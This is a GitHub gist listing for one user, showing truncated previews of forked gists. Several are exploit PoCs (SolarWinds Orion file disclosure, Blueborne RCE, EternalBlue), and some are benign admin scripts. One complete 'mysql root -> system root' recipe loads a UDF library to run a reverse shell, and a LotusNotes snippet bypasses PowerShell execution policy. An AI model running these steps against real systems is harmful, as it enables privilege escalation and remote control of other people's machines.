Shahee Mirza shaheemirza
shaheemirza
/ CVE-2020-10148.py
Created
December 28, 2020 23:51
— forked from 0xsha/Solarwinds_Orion_LFD.py
CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
shaheemirza
/ blueborne-nexus5.py
Created
November 23, 2017 09:42
— forked from jesux/blueborne-nexus5.py
Blueborne RCE PoC - Nexus5 6.0.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import time | |
| import struct | |
| import select | |
| import binascii | |
| import bluetooth | |
| from bluetooth import _bluetooth as bt |
shaheemirza
/ LotusNotes Running PowerShell Code
Created
August 26, 2017 12:18
— forked from danielbohannon/LotusNotes Running PowerShell Code
LotusNotes Running PowerShell Code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } | |
| Hashes of each binary (prepare for onslaught of md5 naysayers): | |
| Notes.exe — 8f633ef1e1147637c25dd917909cd361 | |
| NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126 |
shaheemirza
/ eternalblue8_exploit.py
Created
May 18, 2017 08:36
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
shaheemirza
/ sign.sh
Created
April 6, 2017 12:18
— forked from ezimuel/sign.sh
Sign and verify a file using OpenSSL command line tool. It exports the digital signature in Base64 format.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Sign a file with a private key using OpenSSL | |
| # Encode the signature in Base64 format | |
| # | |
| # Usage: sign <file> <private_key> | |
| # | |
| # NOTE: to generate a public/private key use the following commands: | |
| # | |
| # openssl genrsa -aes128 -passout pass:<passphrase> -out private.pem 2048 | |
| # openssl rsa -in private.pem -passin pass:<passphrase> -pubout -out public.pem |
shaheemirza
/ mysql_root_to_system_root
Created
March 1, 2017 19:42
— forked from p0c/mysql_root_to_system_root
#pentest #recipe: mysql root -> system root (linux)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
shaheemirza
/ convert id_rsa to pem
Created
January 22, 2017 06:01
— forked from mingfang/convert id_rsa to pem
Convert id_rsa to pem file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem | |
| chmod 700 id_rsa.pem |
shaheemirza
/ phpmd-ruleset.xml
Created
December 27, 2016 06:49
— forked from slayerfat/phpmd-ruleset.xml
php mess detector ruleset for laravel and similar frameworks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <ruleset name="Laravel and similar phpmd ruleset" | |
| xmlns="http://pmd.sf.net/ruleset/1.0.0" | |
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
| xsi:schemaLocation="http://pmd.sf.net/ruleset/1.0.0 http://pmd.sf.net/ruleset_xml_schema.xsd" | |
| xsi:noNamespaceSchemaLocation="http://pmd.sf.net/ruleset_xml_schema.xsd"> | |
| <description> | |
| Inspired by https://github.com/phpmd/phpmd/issues/137 | |
| using http://phpmd.org/documentation/creating-a-ruleset.html | |
| </description> |
shaheemirza
/ redis-backup.sh
Created
August 4, 2016 05:31
— forked from acenqiu/redis-backup.sh
redis rdb backup script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| ## redis backup script | |
| ## usage | |
| ## redis-backup.sh port backup.dir | |
| port=${1:-6379} | |
| backup_dir=${2:-"/data/backup/redis"} | |
| cli="/usr/local/bin/redis-cli -p $port" |
shaheemirza
/ compile-nginx.sh
Created
July 31, 2016 07:51
— forked from tollmanz/compile-nginx.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install dependencies | |
| # | |
| # * checkinstall: package the .deb | |
| # * libpcre3, libpcre3-dev: required for HTTP rewrite module | |
| # * zlib1g zlib1g-dbg zlib1g-dev: required for HTTP gzip module | |
| apt-get install checkinstall libpcre3 libpcre3-dev zlib1g zlib1g-dbg zlib1g-dev && \ | |
| mkdir -p ~/sources/ && \ | |
| # Compile against OpenSSL to enable NPN |
NewerOlder